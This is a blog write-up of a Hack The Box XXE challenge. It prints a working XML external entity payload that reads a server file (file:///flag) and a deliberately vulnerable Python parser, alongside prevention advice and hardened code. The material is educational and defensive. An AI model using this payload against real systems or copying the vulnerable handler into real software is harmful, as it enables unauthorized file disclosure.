Hack the box OWASP Top 10: Baby WAFfles

  • carocsteads
  • Feb 23, 2025
  • 2 min read

Updated: Dec 9, 2025

Baby WAFfles order:

Synopsis: XML external entity (XXE) injection, reached by switching the request's Content-Type header from JSON to XML.

Skills Required:

  1. Basic understanding of XXE.

  2. Ability to analyze and implement an XXE injection attack that retrieves an arbitrary file from the server's filesystem.

  3. Basic understanding of XML.

Skills Learned:

  1. Understanding the XXE vulnerability.

  2. Familiarity with the process of exploiting XXE vulnerability.

  3. Experience in analyzing and understanding Burp messages to inject a payload.


The exercise: Our WAFfles and ice scream are out of this world, come to our online WAFfles house and check out our super secure ordering system API!

Analysis:

The first clue is in the challenge synopsis: XML external entity injection by modifying the Content-Type header. The name is a second hint, since "WAFfles" puns on WAF (web application firewall).

The page's browser tab title confirms the XXE theme.

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.


Let's use Burp. Place a WAFfle order for table 33 from the web page, intercept the POST request, and send it to Repeater.

In Repeater, change the Content-Type header from application/json to application/xml and replace the JSON body with the following XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///flag">]>
<order>
  <table_num>1</table_num>
  <food>&xxe;</food>
</order>


The DOCTYPE declares an external entity named xxe whose SYSTEM identifier is the local file "file:///flag". The &xxe; reference inside the food element then makes the parser substitute the file's contents in place of the reference, so whatever the API echoes back for the food field now contains the file.

Send the request with the XXE payload and the flag is presented in the response.

How to prevent XXE via Content-Type manipulation:

  • Disable XML parsing when unnecessary

If your application does not require XML processing, disable XML handling entirely to eliminate the attack vector. This is exactly the weakness here: a JSON API that silently switches to an XML parser whenever the client says Content-Type: application/xml.

Configure web servers and APIs to reject XML Content-Types unless explicitly needed.

  • Use secure XML parsers that prevent external entity expansion

Use safe XML libraries or settings that disable DTD processing and external entity expansion (e.g., defusedxml in Python; in Java, XMLInputFactory with IS_SUPPORTING_EXTERNAL_ENTITIES and SUPPORT_DTD both set to false).

Explicitly disable DOCTYPE and ENTITY declarations in the XML parser (in Java's DocumentBuilderFactory, the http://apache.org/xml/features/disallow-doctype-decl feature), so that a payload like the one above fails before the document body is read.

  • Validate all incoming Content-Type headers

Enforce a strict allowlist of accepted media types (e.g., only application/json, answered with 415 Unsupported Media Type for anything else, including application/xml and text/xml). Compare the media type portion only, so that "application/xml; charset=utf-8" does not slip past a naive string match.

Reject and log unexpected or malformed Content-Type headers to detect manipulation attempts.

A Web Application Firewall (WAF) can block known XXE patterns (DOCTYPE, ENTITY, SYSTEM), but it is defence in depth only: the parser configuration and the Content-Type allowlist are the real fix, as this challenge's name suggests.
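To tie the payload walk-through and the prevention list together, here is an added example in Python; it is not the challenge's code or the author's. It assumes a backend that picks its parser from the client's Content-Type header and an XML parser that resolves external entities; a constructed temporary file stands in for /flag, and the handler names are hypothetical. The vulnerable parser deliberately follows file:// SYSTEM identifiers the way an entity-substituting parser would, while the hardened one refuses any DOCTYPE, and the hardened request handler never reaches an XML parser at all.

```python
import json
import os
import tempfile
from urllib.parse import unquote, urlparse
from xml.parsers import expat


def xxe_payload(target_path: str, table_num: int = 1) -> str:
    """The order document from the write-up, with the target file as a parameter."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file://{target_path}">]>'
        f"<order><table_num>{table_num}</table_num><food>&xxe;</food></order>"
    )


def _collect_leaf_text(parser) -> dict:
    """Install handlers that gather each element's character data, keyed by name."""
    fields, open_elems = {}, []

    def start(name, attrs):
        open_elems.append(name)
        fields.setdefault(name, "")

    def chars(data):
        if open_elems:
            fields[open_elems[-1]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: open_elems.pop()
    parser.CharacterDataHandler = chars
    return fields


def parse_order_vulnerable(xml_data: bytes) -> dict:
    """Parse an <order> with external entities resolved from local disk (the bug).
    Stands in for any parser left in entity-substitution mode: expat hands over
    the SYSTEM id of &xxe; and this handler obligingly reads the file it names."""
    parser = expat.ParserCreate()
    fields = _collect_leaf_text(parser)

    def resolve_external(context, base, system_id, public_id):
        url = urlparse(system_id)
        if url.scheme == "file":  # splice the file's text into the current element
            with open(unquote(url.path), "rb") as fh:
                parser.ExternalEntityParserCreate(context).Parse(fh.read(), True)
        return 1  # tell expat the reference was handled

    parser.ExternalEntityRefHandler = resolve_external
    parser.Parse(xml_data, True)
    return fields


def parse_order_hardened(xml_data: bytes) -> dict:
    """Same fields, but a DOCTYPE, entity declaration or external reference aborts
    the parse (what defusedxml's forbid_dtd/forbid_entities/forbid_external do)."""
    parser = expat.ParserCreate()
    fields = _collect_leaf_text(parser)

    def refuse(*_):
        raise ValueError("DTDs, entity declarations and external entities are rejected")

    parser.StartDoctypeDeclHandler = refuse
    parser.EntityDeclHandler = refuse
    parser.ExternalEntityRefHandler = refuse
    parser.Parse(xml_data, True)
    return fields


def _media_type(content_type: str) -> str:
    # Compare only the media type, so "application/xml; charset=utf-8" is not missed.
    return content_type.split(";", 1)[0].strip().lower()


def handle_order_vulnerable(content_type: str, body: bytes) -> tuple:
    """Hypothetical handler that lets the client's Content-Type choose the parser."""
    if _media_type(content_type) in ("application/xml", "text/xml"):
        order = parse_order_vulnerable(body)
    else:
        order = json.loads(body)
    return 200, f"Table {order['table_num']} ordered {order['food']}"


def handle_order_hardened(content_type: str, body: bytes) -> tuple:
    """Same handler behind a Content-Type allowlist: XML is never parsed at all."""
    if _media_type(content_type) not in {"application/json"}:
        return 415, "Unsupported Media Type"
    order = json.loads(body)
    return 200, f"Table {order['table_num']} ordered {order['food']}"


def make_constructed_flag_file(contents: str = "HTB{constructed_example_flag}") -> str:
    """Stand-in for the server's /flag (constructed data); returns the temp path."""
    fd, path = tempfile.mkstemp(prefix="flag_")
    os.write(fd, contents.encode())
    os.close(fd)
    return path
```

Run it by creating the stand-in flag with make_constructed_flag_file(), building the body with xxe_payload(path), and sending it to both handlers: the vulnerable one reflects the file contents in its 200 response, the hardened one answers 415 without ever touching an XML parser, and parse_order_hardened raises on the DOCTYPE even if XML has to be accepted. Note that the hardened parser still parses well-formed, DTD-free orders normally.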


© 2023 by Carolina Steadham. All rights reserved.